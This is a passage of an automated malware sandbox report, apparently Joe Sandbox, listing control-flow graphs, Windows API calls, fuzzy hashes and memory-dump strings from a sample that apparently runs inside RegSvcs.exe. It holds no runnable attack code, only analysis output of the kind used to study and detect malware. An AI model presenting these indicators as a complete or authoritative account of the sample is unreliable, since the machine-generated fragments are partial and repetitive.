                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bc92c3b0be6e23626fe0f19f89ae5b879a9fef757e959181924c1f80571b1a4b
                                                                          • Instruction ID: d0224a4121563e1c69d3922d0ae856bbd1accca6648da804a6ae0eb6adfbc9c8
                                                                          • Opcode Fuzzy Hash: bc92c3b0be6e23626fe0f19f89ae5b879a9fef757e959181924c1f80571b1a4b
                                                                          • Instruction Fuzzy Hash: 525105B4E152198FCB14DFA9C5805AEFBF2FF89300F24816AD458AB355D734A942CFA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a782e5ae04660bca44b40c7dab6162dda3d81619825ac98f58717b01e01bb026
                                                                          • Instruction ID: 8ebeff2733857bcc23a68fd27669a9be69a9c180d108d0204202103ef582fbee
                                                                          • Opcode Fuzzy Hash: a782e5ae04660bca44b40c7dab6162dda3d81619825ac98f58717b01e01bb026
                                                                          • Instruction Fuzzy Hash: 9D5117B4E052198BCB14DFA9C5805AEFBF2FF89304F24C16AD819AB315D7349941CFA5

                                                                          Execution Graph

                                                                          Execution Coverage:1.2%
                                                                          Dynamic/Decrypted Code Coverage:4.9%
                                                                          Signature Coverage:4.9%
                                                                          Total number of Nodes:142
                                                                          Total number of Limit Nodes:9

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 371 417853-41787c call 42f473 374 417882-417890 call 42fa73 371->374 375 41787e-417881 371->375 378 4178a0-4178b1 call 42df13 374->378 379 417892-41789d call 42fd13 374->379 384 4178b3-4178c7 LdrLoadDll 378->384 385 4178ca-4178cd 378->385 379->378 384->385
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                          • Instruction ID: 1cb38ccdf7d651f1bb70c04efbc39f1e1caf3780722470d7d920a02544f09f31
                                                                          • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                          • Instruction Fuzzy Hash: 110152B1E4020DB7DF10EAE1DC42FDEB7789B14308F4041A6E90897240F634EB48C795

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 396 42c7c3-42c7fc call 404653 call 42da03 NtClose
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 410 1522b60-1522b6c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495

                                                                          Control-flow Graph

                                                                          control_flow_graph 10 414086-4140d0 call 42e933 call 42f343 call 417853 18 4140d7-4140fd call 424f43 10->18 19 4140d2 call 4045c3 10->19 22 41411d-414123 18->22 23 4140ff-41410e PostThreadMessageW 18->23 19->18 23->22 24 414110-41411a 23->24 24->22
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495

                                                                          Control-flow Graph

                                                                          control_flow_graph 25 414093-4140d0 call 42e933 call 42f343 call 417853 33 4140d7-4140fd call 424f43 25->33 34 4140d2 call 4045c3 25->34 37 41411d-414123 33->37 38 4140ff-41410e PostThreadMessageW 33->38 34->33 38->37 39 414110-41411a 38->39 39->37
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495

                                                                          Control-flow Graph

                                                                          control_flow_graph 40 414124 call 42e933 call 42f343 call 417853 48 4140d7-4140fd call 424f43 40->48 49 4140d2 call 4045c3 40->49 52 41411d-414123 48->52 53 4140ff-41410e PostThreadMessageW 48->53 49->48 53->52 54 414110-41411a 53->54 54->52
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: H846yjBj$H846yjBj
                                                                          • API String ID: 1836367815-1638195495

                                                                          Control-flow Graph

                                                                          control_flow_graph 386 42cae3-42cb27 call 404653 call 42da03 RtlAllocateHeap
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(?,0041E634,?,?,00000000,?,0041E634,?,?,?), ref: 0042CB22
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 391 42cb33-42cb74 call 404653 call 42da03 RtlFreeHeap
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,004170BD,000000F4), ref: 0042CB6F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 401 42cb83-42cbbc call 404653 call 42da03 ExitProcess
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,20989162,?,?,20989162), ref: 0042CBB7
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 406 1522c0a-1522c0f 407 1522c11-1522c18 406->407 408 1522c1f-1522c26 LdrInitializeThunk 406->408
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          Strings
                                                                          • double initialized or corrupted critical section, xrefs: 01555508
                                                                          • corrupted critical section, xrefs: 015554C2
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0155540A, 01555496, 01555519
                                                                          • Address of the debug info found in the active list., xrefs: 015554AE, 015554FA
                                                                          • Critical section address, xrefs: 01555425, 015554BC, 01555534
                                                                          • Critical section address., xrefs: 01555502
                                                                          • Critical section debug info address, xrefs: 0155541F, 0155552E
                                                                          • 8, xrefs: 015552E3
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015554E2
                                                                          • Thread identifier, xrefs: 0155553A
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015554CE
                                                                          • undeleted critical section in freed memory, xrefs: 0155542B
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01555543
                                                                          • Invalid debug info address of this critical section, xrefs: 015554B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          Strings
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01552506
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015522E4
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01552498
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01552412
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01552409
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015525EB
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0155261F
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01552624
                                                                          • @, xrefs: 0155259B
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015524C0
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01552602
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01568A3D
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01568A67
                                                                          • VerifierDebug, xrefs: 01568CA5
                                                                          • VerifierFlags, xrefs: 01568C50
                                                                          • VerifierDlls, xrefs: 01568CBD
                                                                          • HandleTraces, xrefs: 01568C8F
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01568B8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          Strings
                                                                          • apphelp.dll, xrefs: 014D6496
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01539A01
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01539A11, 01539A3A
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01539A2A
                                                                          • LdrpInitShimEngine, xrefs: 015399F4, 01539A07, 01539A30
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015399ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          Strings
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0155219F
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01552160, 0155219A, 015521BA
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01552180
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01552178
                                                                          • SXS: %s() passed the empty activation context, xrefs: 01552165
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015521BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 0151C6C4
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01558170
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 015581E5
                                                                          • LdrpInitializeImportRedirection, xrefs: 01558177, 015581EB
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0151C6C3
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01558181, 015581F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          APIs
                                                                            • Part of subcall function 01522DF0: LdrInitializeThunk.NTDLL ref: 01522DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01520D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 01518422
                                                                          • @, xrefs: 01518591
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01518421
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0151855E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          Strings
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015521D9, 015522B1
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015522B6
                                                                          • SXS: %s() passed the empty activation context, xrefs: 015521DE
                                                                          • .Local, xrefs: 015128D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          Strings
                                                                          • RtlDeactivateActivationContext, xrefs: 01553425, 01553432, 01553451
                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0155342A
                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01553456
                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01553437
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015410AE
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01541028
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0154106B
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01540FE5
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          Strings
                                                                          • apphelp.dll, xrefs: 01502462
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0154A9A2
                                                                          • LdrpDynamicShimModule, xrefs: 0154A998
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0154A992
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014F327D
                                                                          • HEAP: , xrefs: 014F3264
                                                                          • HEAP[%wZ]: , xrefs: 014F3255
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0154A121
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0154A10F
                                                                          • LdrpCheckModule, xrefs: 0154A117
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
